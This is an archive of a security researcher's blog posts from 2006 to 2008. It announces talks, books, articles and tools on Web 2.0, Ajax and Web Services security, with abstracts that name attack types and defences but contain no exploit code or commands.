Training Title: Web Application Security – Advanced Attacks and Defense

Presentation Title: Securing Next Generation Applications – Scan, Detect and Mitigate

Presentation Details:

McKinsey’s recent global survey suggested that 80% of companies are investing in Web 2.0 technologies. Web 2.0 technologies are no longer restricted to social networking site but forming backend to enterprise level applications. This evolution is giving rise to next generation application hacking and attack vectors. It is imperative to understand these new attacks and scanning methods to detect vulnerabilities. This presentation will be full of real life cases, live demonstrations, new tools and techniques along in-depth coverage on the latest concepts and methodologies.

Presenting Research at RSA 2008

2008-03-20T03:49:00.000-07:00

Session Code: SOA-202
Session Title: Web 2.0 Security Chess: Combat Strategies and Defense Tactics
Scheduled Date/Time: Wednesday, April 09 09:10 AM
RED ROOM 310
Session Abstract: Ajax, web services and rich Internet (Flash) are redefining moves on the security chessboard. Attack strategies are emerging like cross-site scripting with JSON or cross-site request forgery with XML. This session will cover Web 2.0 attacks, tools for assessment, and approaches for code analysis with demonstrations. Professionals can apply knowledge in real life to a secure Web 2.0 application layer.

Agenda

Infosecworld 08 - Presentations on iHTTPModule and CSRF

2008-03-13T09:03:00.000-07:00

You can go through my presentation and research work on iHTTPModule and CSRF. I have posted them on slideshare. Here is the posting you can view over here or go to the slideshare.

[CSRF]

| View | Upload your own

[.NET iHTTPModule - Interesting stuff]

| View | Upload your own

InfosecWorld - iHTTPModule and CSRF

2008-03-09T15:28:00.000-07:00

Speaking on iHTTPModule with IIS 7.0 integrated pipe. It can help in building defense by creating WAF. Also, addressing CSRF and security controls around it. Looking forward to meet some of the application security folks as well.

Workshop in Dubai - Application Security

2008-03-03T03:54:00.000-08:00

Having 2 days workshop for ISACA in Dubai. Look forward to meet some of UAE folks. Cheers!

If you are interested in joining - More Detail

BLackhat DC - On Web 2.0 Scanning

2008-02-16T21:50:00.000-08:00

Scanning Applications 2.0 - Next generation scan, attacks and tools

Ajax, Web Services and Rich Internet (Flash) are redefining application security scanning challenges and strategies. We are witnessing some emerging attack vectors like Cross Site Scripting with JSON, Cross Site Request Forgery with XML, WSDL scanning, XPATH injection with XML streams etc. This presentation will cover Web 2.0 attacks, new scanning tools for assessment and approaches for Web 2.0 code analysis with demonstrations. Professionals can apply knowledge in real life to secure Web 2.0 application layer.

This presentation will focus on core Web 2.0 security issues along with assessment toolkit developed by the presenter. 1.) It is imperative to analyze Web 2.0 application architecture with security standpoint. We will evaluate real life vulnerabilities with Google, MySpace and Yahoo. 2.) Web 2.0 technology fingerprinting is very critical step to determine application security posture. 3.) Crawling Ajax driven application is biggest challenge and we will cover approaches to address this critical issue by dynamic DOM event management with Ruby. 4.) Scanning Web 2.0 application for security holes is an emerging issue. It needs lot of JavaScript analysis with DOM context to discover XSS and XSRF vulnerabilities in Ajax and Flash with new attack vectors hidden in payload structures like JSON, XML, JS-Arrays etc. 5.) Addressing assessment methods and tools to discover security lapses for SOAP, REST and XML-RPC based Web Services along with innovative fuzzing.

[Tool] AppPrint - Web and Application Server Fingerprinting/Mapping tool (Beta)

2007-12-31T02:02:00.000-08:00

Posted a new tool on the site.
-- Description --
AppPrint scans IP range, IP or host for Web and Application servers. It scans port 80 for a particular target and tries to deduce the banner using httprint methodology. This gives best guessed banner for Web Server. In next step it uses method of forced plug-in invoke and scan for application server type. At this point it tries to fingerprint Tomcat, WebLogic, WebSphere, Orion, ColdFusion and Resin. It requires .NET framework installed. In future version we will build several other technology mapping and fingerprinting technologies like Ajax, RIA, Flash, Laszlo etc.
--

Read and Download

[net-security paper] Dissecting and Digging Application Source Code for Vulnerabilities

2007-12-27T05:11:00.000-08:00

Application source code scanning for vulnerability detection is an interesting challenge and relatively complex problem as well. There are several security issues which are difficult to identify using blackbox testing and these issues can be identified by using whitebox source code testing methodlogy. Application layer security issues may be residing at logical layer and it is very important to have source code audit done to unearth these categories of bugs. This paper is going to address following areas:

1. How to build simple rules using method and class signatures to identify possible weak links in the source code.
2. How to do source code walking across the entire source base to perform impact analysis.
3. How to use simple tool like AppCodeScan or similar utility to perform effective source code analysis to detect possible vulnerability residing in your source base.

Read here

Tool Update - AppCodeScan 1.1

2007-12-15T03:16:00.000-08:00

AppCodeScan 1.1 is posted on the site with following changes

1. Parsing of code is changed and now tool shows line number where pattern is found in both scanning and code walking functionality.
2. There were some bugs which are fixed to do recursive three layer scanning.

Download from here

Thanks for your feedback.

Cheers!

[Book] Web 2.0 Security - Defending AJAX, RIA, AND SOA

2007-12-12T00:08:00.000-08:00

SOA, RIA, and Ajax are the backbone behind the now widerspread Web 2.0 applications such as MySpace, GoogleMaps, and Wikipedia. Although these robust tools make next generation web applications possible, they also add new security concerns to the field of web application security. Yamanner, Samy and Spaceflash type worms are exploiting “client-side” Ajax frameworks, providing new avenues of attack and compromising confidential information. Portals like Google, NetFlix, Yahoo and MySpace have witnessed new vulnerabilities in the past. These vulnerabilities can be leveraged by attackers to perform Phishing, Cross-site Scripting (XSS) and Cross-Site Request Forgery (XSRF) exploitation. Web 2.0 Security: Defending Ajax, RIA, and SOA is the book to cover the new field of Web 2.0 security. Written for intermediate-to-advanced security professionals and developers, the book explores Web 2.0 hacking methods and helps in enhancing next generation security controls for better application security posture. Readers will gain knowledge in advanced footprinting and discovery techniques, Web 2.0 scanning and vulnerability detection methods, Ajax and Flash hacking methods, SOAP, REST and XML-RPC hacking, RSS/Atom feed attacks, fuzzing and code review methodologies and tools, tool building with Python, Ruby and .NET, and much, much more. The book includes a companion CD-ROM with tools, demos, samples, code, and images.

More on Amazon

[Clubhack - Conference] Hacking Web 2.0 Art and Science of Vulnerability Detection

2007-12-04T22:05:00.000-08:00

ClubHack - Pune, India.

Going to talk on following: Web 2.0 applications are on the rise and as Gartner has predicted by end of 2007, 30% of applications would be running with Web 2.0 components embedded in it. This change in scenario would provide various different entry points and security holes for attackers. Hacking Web 2.0 is the most required skill for security professionals to identify vulnerability and associated threat before an attacker exploits it. New attack vectors are on the rise like two way CSRF access, XSS through JSON, JS-Object, XML and Array streams, Client side eval() exploitations, XPATH injection, WSDL scanning, Web Services payloads through SOAP and REST, XML-RPC method exploitation etc. One needs to do both scientific and artistic analysis of application to identify these vulnerabilities and this talk will cover these emerging attack vectors with plenty of demonstrations and tools. You will take home thorough knowledge about Web 2.0 hacking and would be in position to apply at work immediately.

Go to Conference page

DeepSec - Talk on Ajax Security

2007-11-27T21:47:00.000-08:00

I had great time at Vienna last week. Did web hacking training and talked on Web 2.0 security. Conference was great and able to learn a lot from other speakers. Here is my talk.

| View | Upload your own

OWASP AppSec 2007 - .NET Web Services Hacking

2007-11-20T10:01:00.000-08:00

AppSec at San-Jose was really fun. I was able to learn some good stuff. I talked on .NET Web Services Hacking. Here is my slide show.

| View | Upload your own

OWASP - .NET Web Services Hacking

2007-10-31T00:11:00.000-07:00

.Net Web Services Hacking - Scan, Attacks and Defense
Following topics will be covered.
1. Web Services Discovery strategies in Web 2.0 applications
2. Scanning and profiling Web Services.
3. Attacking and Fuzzing Web Services for Vulnerability detection
4. Defense strategies for Web Services with content filtering (HTTPModule) - Web Services Firewall

Some of the content will be covered from my books - Hacking Web Services and Web 2.0 Security - Defending Ajax, RIA and SOA.

Look forward to see OWASP and WASC folks.

web2wall : Web Application/Services Firewall - IHTTPModule for Web 2.0 application

2007-10-15T23:38:00.000-07:00

Microsoft‘s .Net framework includes two interfaces - IHTTPModule and IHTTPHandler. These two interfaces can be leveraged to provide application-level defense customized to application-level, folder-level or variable-level. This can act as the first line of defense, before any incoming request touches the Web application source code level. This is Web application defense at the gates, for the .Net framework on IIS.

Web2wall is a simple binary module which can be loaded in your Web 2.0 applications. You can defend your application layer code by using regex patterns; this can help in filtering XML and JSON streams. This tool is in beta and more features will be added with time. We will resolve bugs to make the module much more robust.

Download

AppCodeScan - Application Code Scanning tool

2007-10-06T05:03:00.000-07:00

This tool is designed to help in performing whitebox testing. During whitebox testing one needs to scan complete application code for various different vulnerabilities like XSS, SQL injection, Poor validations etc. It is possible to discover these vulnerable points using this tool and one can follow code walking across the code base to trace this vulnerability.This tool works on following two areas:

Code Scanning - One needs to feed target code folder, rules pattern in regex (sample is provided for ASP) and list of file extension to scan. The tool will take this information and run against the target folder with depth of three (3) and scan each line for matching pattern. If pattern is found then it will report that line in the tool.
Code Walker - This little utility would help in walking across the code base and find variable or function. This will help to trace variables and their entire path in the large code base. This utility would help in negating false positives from the identified pattern.

This tool runs on .NET framework and still in initial beta state. We are working on it and more features will be added.

Download and Play

[Dubai-ISACA] I-SAFE Information Governance in this e- World

2007-10-02T08:55:00.000-07:00

Speaking on - EMERGING TECHNOLOGIES: Web 2.0 on the rise and related technologies,strategies and security

This presentation is going to cover all aspects of emerging technologies in detail with real life cases and demonstrations. Following which, the session will explore security issues growing around these vectors and threats associated with it. Professionals will be able to collect enough know-how on emerging web technologies to apply this learning to their work place.

Read More

Tools are posted

2007-09-24T05:59:00.001-07:00

Hi, I have posted following tools on the site

1. wsScanner - Web Services Footprinting, Discovery, Enumeration, Scanning and Fuzzing tool
2. scanweb2.0 - Web 2.0 Fingerprinting, Scanning and Discovery tools (Ruby scripts)
3. AppMap - Application footprinting and mapping tool using MSN APIs

It should help in assessment and audit.

Download from Blueinfy

HITB 2007 - Follow up...

2007-09-14T22:01:00.000-07:00

HITB 2007 was great this time around as well. Both class and talk went really well. Speakers were good and was able to learn new stuff. All material is posted here.

I presented on Web 2.0 hacking, keeping focus on Ajax and Web Services. Added some new demos for better understanding. Presentation movie is not yet posted. Following is my presentation.

You can download slides from here
If you have any question feel free to drop me a note at shreeraj.shah@gmail.com

Enjoy...

HITB 2007 - Class and Talk

2007-08-09T21:17:00.000-07:00

Training - Advanced Web Application & Services Hacking [Here]
Speaking - Hacking Ajax and Web Services – Next Generation Web Attacks on the Rise [Here]

WEB 2.0 technologies for the Web application layer are still evolving. This framework consists of Web services, AJAX and SOAP/XML and while still evolving has thrown up new attack vectors. To combat the attacks one needs to understand the new methodology, tools and strategies. This presentation reveals emerging security threats, some of which will be demonstrated.

Logical evolution of Web applications has reached a new level with the introduction of WEB 2.0. WEB 2.0 is the combination of new technologies like Web services, AJAX and SOAP. It is important to understand this framework and the fundamentals, before looking at security threats. Ajax is becoming integral part of these new applications and its serialization aspect opens up new ways of hacking browser side application which can lead to XSS and XSRF.

Comprehending XML-based attack vectors LDAP/SQL injections, SOAP messaging attacks, AJAX and Web profiling. These shall be covered along with demonstration examples. Web services are the backbone of WEB 2.0 and it is important to understand security threats.

Change in contcat info...

2007-08-01T21:14:00.000-07:00

Friends, Please kindly note my new email address and make changes to your address books. You can reach me at following email addresses.

shreeraj.shah_at_gmail.com
shreeraj_at_blueinfy.com

Thanks!

[DevX] Secure Your Wireless Networks with Scapy Packet Manipulation

2007-06-12T21:12:00.000-07:00

With wireless networks beginning to dominate both home and corporate networking, new challenges on the security front are inevitable. The first step in securing a wireless network is determining the state of the network (without any prior knowledge) and then providing a defense against intrusions. Enter Scapy, an excellent packet-crafting tool written in Python by Philippe Biondi. Unlike other sniffers such as Kismet and Airodump-ng, Scapy is scriptable and extremely easy to use.

This article outlines a methodology for wireless network assessment and intrusion detection using proven techniques with tools such as Scapy.

Read Here

Web 2.0 and Mod Security 2.0

2007-05-19T03:56:00.000-07:00

Ajax and Web Services are two important aspects of Web 2.0 applications. In the past I wrote articles on defending application layer using Mod Security 1.0. New version of Mod Security is out there and Ryan C. Barnett has enhanced both the articles by adding 2.0 changes. They are posted on Mod Security site for community review. Here are pointers to both the documents. You may find it helpful.

Securing Web Services with ModSecurity 2

Ajax Fingerprinting and Filtering with ModSecurity 2

Web 2.0 Threats and Risks for Financial Services

2007-04-30T03:06:00.000-07:00

Web 2.0 technologies are gaining momentum worldwide, penetrating in all industries as enterprise 2.0 applications. Financial services are no exception to this trend. One of the key driving factors behind penetration of Web 2.0 into the financial services sector is the “timely availability of information”. Wells Fargo, Merill Lynch and JP Morgan are developing their next generation technologies using Web 2.0 components; components that will be used in banking software, trading portals and other peripheral services. The true advantage of RSS components is to push information to the end user rather than pull it from the Internet. The financial industry estimates that 95% of information exists in non-RSS formats and could become a key strategic advantage if it can be converted into RSS format. Wells Fargo has already implemented systems on the ground and these have started to yield benefits. Financial services are tuning into Web 2.0 but are simultaneously exposing their systems to next generation threats such as Cross site Scripting (XSS), Cross Site Request Forgery (CSRF) and Application interconnection issues due to SOA.

Read my article

Hacking Web 2.0 - Defending Ajax and Web Services

2007-04-07T05:45:00.000-07:00

HITB 2007 at Dubai was fun and I presented on Web 2.0 hacking. If you would like to go through slides.

WEB 2.0 Hacking – Defending Ajax and Web Services

2007-03-20T22:38:00.000-07:00

WEB 2.0 technologies for the Web application layer are still evolving. This framework consists of Web services, AJAX and SOAP/XML and while still evolving has thrown up new attack vectors. To combat the attacks one needs to understand the new methodology, tools and strategies. Steadily emerging as the first line of defense is the Web application firewall. This presentation reveals emerging security threats, some of which will be demonstrated.

Here

Advanced Web Application & Services Hacking

2007-03-20T22:35:00.000-07:00

Training at Dubai for HITB 2007.

A growing concern has been Web application security Web and application servers are the target of regular attacks by attackers that exploit security loopholes or vulnerabilities in code or design. Adding to this concern are next generation applications; applications that are on the fast track and more appealing to the user, utilizing dynamic AJAX scripts, Web services and newer Web technologies to create intuitive and easy interfaces. The only constant in this space is change. In this dynamically changing scenario it is important to understand new threats that emerge in order to build constructive strategies to protect corporate assets.

This two day workshop will expose students to both aspects of security: attacks and defense. To think of newer Web applications without Web services is a big mistake. Sooner or later existing applications will be forced to migrate to the new framework. This workshop includes several cases, demonstrations and hands-on exercises with newer tools to give you a headstart over others in the field.

Here

ISACA-UAE - Web Application Workshop ...

2007-03-13T22:30:00.000-07:00

One day conference at Dubai on Web Application Security.
Here

RSS Security Threats With Financial Services

2007-03-11T22:46:00.000-07:00

Web 2.0 technologies are penetrating deeper into the financial services sector as Enterprise 2.0 solutions, adding value to financial services. Analysts can leverage information sources to go beyond the obvious. Trading and Banking companies like Wells Fargo and E*Trade are developing their next generation technologies using Web 2.0 components; components that will be used in banking software, trading portals and other peripheral services. The true advantage of RSS components is to push information to the end user rather than pull it from the Internet. The financial industry estimates that 95% of information exists in non-RSS formats and could become a key strategic advantage if it can be converted into RSS format. Wells Fargo has already implemented systems on the ground and these have started to yield benefits. RSS comes with its own security issues that assume critical significance with regard to financial services. In this article we will see some of the security concerns around RSS security and attack vectors.

Read here

My Bio with respect to Web Security Contribution...

2007-03-11T22:39:00.000-07:00

Anurag is running a reflection series on his blog for web security professionals. He is compiling a list of person along with their resources. He has posted mine this week. You can read it here

Web 2.0 with Banks - Web Risk: A Growing Web's Harder To Secure

2007-02-28T19:42:00.000-08:00

Banks are moving towards Web 2.0 frameworks and adding risk to the application layer. This news item talks about it.

Read

Ajax scanning on AjaxWorld

2007-02-19T22:21:00.000-08:00

Ajax Scanning technique for XSS is posted at AjaxWorld magazine.
Here

Scanning Ajax for XSS Entry Points

2007-02-15T05:08:00.000-08:00

The continuous adoption of Web 2.0 architecture for web applications is instrumental in Ajax, Web services and Flash, emerging as key components. Ajax is a combination of technologies such as JavaScript with the XMLHttpRequest object, DOM and XML streams. Cross site scripting (XSS) can make browsers vulnerable to critical information hijacking if exploited with malicious intent. XSS is already categorized as persistent, non-persistent and DOM-based. Ajax code loaded in browser can have entry points to XSS and it is the job of the security analyst to identify these entry points. It is difficult to decisively conclude that possible entry points to an application can be exploited. One may need to do a trace or debug to measure the risk of these entry points.

This paper introduces you to a quick way to identify XSS entry points in an application.

Read here

Stateful Web Application Firewalls with .NET

2007-02-09T21:20:00.000-08:00

A Web Application Firewall (WAF), though still evolving, is crucial for strong application layer defense. Unfortunately, HTTP is a stateless protocol, and session management is addressed at the application layer and not at the protocol layer. It is possible to bridge WAF and session objects on the .NET platform to build a stateful WAF (SWAF).

Read Here

Slides to Share

2007-02-05T03:04:00.000-08:00

I found slideshare.net an interesting place to share past talks. I have posted some of my past speaking engagements at RSA, Infosecworld, AusCERT, Bellua and HITB on it. You may like it.

Here

Ajax Fingerprinting for Web 2.0 Applications

2007-01-30T05:36:00.000-08:00

Fingerprinting is an age old concept and one that adds great value to assessment methodologies. There are several tools available for fingerprinting operating systems (nmap), Web servers (httprint), devices, etc. Each one of these tools uses a different method – inspecting the TCP stack, ICMP responses, HTTP responses. With this evolution of Web 2.0 applications that use Ajax extensively, it is important to fingerprint Ajax tools, framework or library used by a particular web site or a page. This paper describes the method of doing Ajax fingerprinting with a simple prototype serving as an example.
Read Here

Detect Your Web Application's Vulnerabilities Early with Ruby

2007-01-29T19:57:00.000-08:00

Web application fuzzing is a method of detecting a web application's vulnerabilities prior to deploying the application on a production system. Users of this approach send several malicious requests to the application and, based on the responses received, determine the application's security posture. Users also can apply fuzzing to perform tests on several different attack vectors such as SQL, XPATH, and LDAP injection, and error handling.

Read Here

Crawling Ajax-driven Web 2.0 Applications

2007-01-19T02:00:00.000-08:00

Crawling web applications is one of the key phases of automated web application scanning. The objective of crawling is to collect all possible resources from the server in order to automate vulnerability detection on each of these resources. A resource that is overlooked during this discovery phase can mean a failure to detect some vulnerabilities. The introduction of Ajax throws up new challenges for the crawling engine. New ways of handling the crawling process are required as a result of these challenges. The objective of this paper is to use a practical approach to address this issue using rbNarcissus, Watir and Ruby.

Full paper

Book review - Microsoft Technet

2007-01-05T06:28:00.000-08:00

Technet posted book review on Hacking web services
Here
--
Shreeraj Shah's Hacking Web Services (Charles River Media, 2006) is a valuable resource for those involved in development, deployment, or support of Web services. The book is a well-organized general security reference for Web services and their component technologies. And it does a good job of detailing what is involved in defending them in your infrastructure and through your development practices.

The book begins with a relatively in-depth introduction to Web services A case study titled "The Consequences of Procrastination" teaches you about the power of preemptive security procedures and the penalties of reactive systems. The chapter titled "Web Services Scanning and Enumeration" discusses how to use the wsChess, a .NET-based Web service security toolkit from Net-Square (net-square.com/wschess/index.shtml), to profile and footprint Web services.

The book includes a utility CD, which contains a sample .NET-based application called SOAPWall. This shows you how to block injection characters and buffer overflows in your .NET Web services. In addition, the CD provides demos of different types of Web service attacks.
--

XSRF attack vector with Ajax serialization

2006-12-19T21:15:00.000-08:00

Cross-site request forgery (CSRF) is a commonly observed security issue in Web applications, and it can be exploited by an attacker or by a worm. Exploitation of this bug is very easy given there are several HTML tags and embedded JavaScript code snippets that can be leveraged by the browser to initiate a forged request without the consent or knowledge of an end user.

This request hits the vulnerable Web application like a cruise missile charged with the end user's session identity and the attacker's objective is achieved. This objective may be a request for a change of password, performing a financial transaction or sending forged email. A vulnerable Web 2.0 application can be susceptible to such an attack. With Web 2.0, another dimension is being added to this attack vector -- the blissfully unaware end user.

Read

Vulnerability Scanning Web 2.0 Client-Side Components

2006-11-28T20:21:00.000-08:00

Web 2.0 applications are a combination of several technologies such as Asynchronous JavaScript and XML (AJAX), Flash, JavaScript Object Notation (JSON), Simple Object Access Protocol (SOAP), Representational State Transfer (REST). All these technologies, along with cross-domain information access, contribute to the complexity of the application. We are seeing a shift towards empowerment of an end-user's browser by loading libraries.

All these changes mean new scanning challenges for tools and professionals. The key learning objectives of this article are to understand the following concepts and techniques:

* Scanning complexity and challenges in new generation Web applications
* Web 2.0 client-side scanning objectives and methodology
* Web 2.0 vulnerability detection (XSS in RSS feeds)
* Cross-domain injection with JSON
* Countermeasures and defense through browser-side filtering

Read

Web 2.0 defense with Ajax fingerprinting & filtering

2006-11-27T07:07:00.000-08:00

(IN)SECURE magazine contains my article on Ajax fingerprinting and filtering technique. It can help in defending Web 2.0 applications.

Top 10 Ajax Security Holes and Driving Factors

2006-11-10T10:10:00.000-08:00

One of the central ingredients of Web 2.0 applications is Ajax encompassed by JavaScripts. This phase of evolution has transformed the Web into a superplatform. Not surprisingly, this transformation has also given rise to a new breed of worms and viruses such as Yamanner, Samy and Spaceflash. Portals like Google, NetFlix, Yahoo and MySpace have witnessed new vulnerabilities in the last few months. These vulnerabilities can be leveraged by attackers to perform Phishing, Cross-site Scripting (XSS) and Cross-Site Request Forgery (XSRF) exploitation.

Read

[O'reilly Net] Detecting Web Application Security Vulnerabilities

2006-11-02T20:36:00.000-08:00

Your web application is only as secure as the data coming in, and how you treat user input determines how secure you are. A little bit of thought and Python programming can help you analyze potential vulnerabilities in your code

Read Here

How safe is Web 2.0?

2006-10-23T21:50:00.000-07:00

Technology commentator Bill Thompson says the latest incarnation of the web, dubbed Web 2.0, is prone to the same flaws as its predecessor

[Top 10 Web 2.0 attack vectors are taken as reference]
Read story

Hacking Web 2.0 Applications with Firefox

2006-10-11T21:33:00.000-07:00

AJAX and interactive web services form the backbone of “web 2.0” applications. This technological transformation brings about new challenges for security professionals.

This article looks at some of the methods, tools and tricks to dissect web 2.0 applications (including Ajax) and discover security holes using Firefox and its plugins. The key learning objectives of this article are to understand the:

* web 2.0 application architecture and its security concerns.
* hacking challenges such as discovering hidden calls, crawling issues, and Ajax side logic discovery.
* discovery of XHR calls with the Firebug tool.
* simulation of browser event automation with the Chickenfoot plugin.
* debugging of applications from a security standpoint, using the Firebug debugger.
* methodical approach to vulnerability detection.

Read

2006-10-09T22:54:00.000-07:00

On slashdot you can read reviews on HNS article - Top 10 Web 2.0 Attack Vectors

Read

Top 10 Web 2.0 attack vectors

2006-10-09T06:06:00.000-07:00

Web 2.0 is the novel term coined for new generation Web applications. start.com, Google maps, Writely and MySpace.com are a few examples. The shifting technological landscape is the driving force behind these Web 2.0 applications. On the one hand are Web services that are empowering server-side core technology components and on the other hand are AJAX and Rich Internet Application (RIA) clients that are enhancing client-end interfaces in the browser itself.

XML is making a significant impact at both presentation and transport (HTTP/HTTPS) layers. To some extent XML is replacing HTML at the presentation layer while SOAP is becoming the XML-based transport mechanism of choice.

More

Book - Hacking Web Services

2006-08-11T04:33:00.000-07:00

Web Services are an integral part of next generation Web applications. The development and use of these services is growing at an incredible rate, and so too are the security issues surrounding them. Hacking Web Services is a practical guide for understanding Web services security and assessment methodologies. Written for intermediate-to-advanced security professionals and developers, the book provides an in-depth look at new concepts and tools used for Web services security. Beginning with a brief introduction to Web services technologies, the book discusses Web services assessment methodology, WSDL -- an XML format describing Web services as a set of endpoints operating on SOAP messages containing information -- and the need for secure coding. Various development issues and open source technologies used to secure and harden applications offering Web services are also covered. Throughout the book, detailed case studies, real-life demonstrations, and a variety of tips and techniques are used to teach developers how to write tools for Web services. If you are responsible for securing your company's Web services, this is a must read resource!

More information

Security Bugs Undercut Mozilla

2006-05-10T05:33:00.000-07:00

New flaws leave experts wondering if Mozilla's such a great alternative to Microsoft Internet Explorer and Exchange

Read the story

Auscert 2006 - Web Services Hacking...

2006-02-24T22:19:00.000-08:00

AusCERT Asia Pacific
Information Technology Security Conference
21st - 26th May 2006 - Royal Pines Resort - Gold Coast, Australia
More info

Dallascon - Adavanced Web Services Hacking...

2006-02-24T22:13:00.000-08:00

Presenting paper at Dallascon in first week of May.

DallasCon Information & Wireless Security conference
May 5-6, 2006
Richardson Hotel
Details

EUSecWest talk...

2006-02-23T23:33:00.000-08:00

It was fun to be at EUSecWest. Talks and presentations were good. Justin made good notes on it. You can read it over here.

Day 1
Day 2

Releasing wschess 1.5

2006-01-28T21:08:00.000-08:00

Following changes are included.

+ Few bugs are solved
+ wspawn is now querying Xmethods. UBRs are closed for Microsoft, IBM etc.
+ wsknight has analysis engine in place. You can supply regex patterns and wsaudit will detect them. It will change color of text. Sample rule file is included.

Get it

Security Advisory - Microsoft ASP.NET Web Services

2006-01-26T09:42:00.000-08:00

Unhandled exception leads to LDAP injection disclosure.
Read Here

Advanced Web Hacking - Attacks & Defense (Upcoming talk)

2006-01-14T20:52:00.000-08:00

Abstract:

Attacks to web application layer are on the rise and innovative methodologies, attack vectors and exploits are coming into existence. To combat these threats it is imperative to understand its nature, characteristics and risk to application layer. Some of the new attack vectors are XPATH injection, LDAP poisoning and advanced SQL injection. These vectors are getting popular with XML based web applications. At the same time new methodologies for web application foot printing and discovery are coming to existence with rich search engine information provided by Google & MSN. These methodologies are important to have as a tool to web security professionals. Open source exploit framework like Metasploit can be used effectively for web application exploit development for penetration testers. This presentation will encompass new methodologies, tools and techniques on both the aspects - attacks & defense.

Hacking Web Services: Strategies, Tools, and Methods (Upcoming talk)

2006-01-12T04:31:00.000-08:00

Date: Tuesday, 4 April 2006
Time: 3:30pm - 5pm
Track: E-Security

Objectives:
1.)Web services as a new area of attack in the Web application domain
2.)A live demo of a Web services assessment methodology
3.)Understanding the Web protocols UDDI, SOAP and WSDL - the latest means of Web services attacks
4.)Leveraging content filtering and secure coding for Web services
5.)Implementing tools and creating your own tool on the fly while performing your work on Web services, e.g. wsChess

Hacking and Securing .NET (Upcoming talk)

2006-01-12T04:20:00.000-08:00

Date: Tuesday, 4 April 2006
Time: 8:30am - 10:45am
Track: Platform Security

Objectives:
1.)Understanding the evolution of Web application from CGI scripts to .Net apps and the security concerns along the way
2.).Net Web application hacking methodology and tools required to perform a thorough assessment.
3.).Net and IIS metabase querying and auditing for overall secure deployment of Web application on the framework
4.)HTTP stack intercept on .Net and leveraging it for application security
5.)Building your own HTTPModule and interface to perform content filtering for Web applications

MSNPawn - New tool is coded up.

2006-01-11T05:35:00.000-08:00

MSNPawn has been designed and developed on the .Net framework and must be installed on the system. The following utilities have been bundled with MSNPawn.

MSNHostFP - Supply an IP Address or IP Address range to fetch all possible virtual hosts or application running on each IP addresses.

MSNDomainFP - Supply a domain name to fetch the top 50 child domains, considering the supplied domain name as parent.

MSNCrossDomainFP - Supply an application domain to fetch the top 50 domains pointing to this particular domain on the Internet.

MSNCrawler - Supply a domain or application name to fetch all possible links crawled by the search engine.

MSNFetch - Supply a domain and rules file. The tool will run each rule in the file against the domain specified and fetch the first five results of the resultant query. This can help in assessing an application.

Search.MSN - Provides place to run your search against MSN and gather all URLs.

Whitepaper is included for better understanding for all these tools.

[Download]

[Download paper]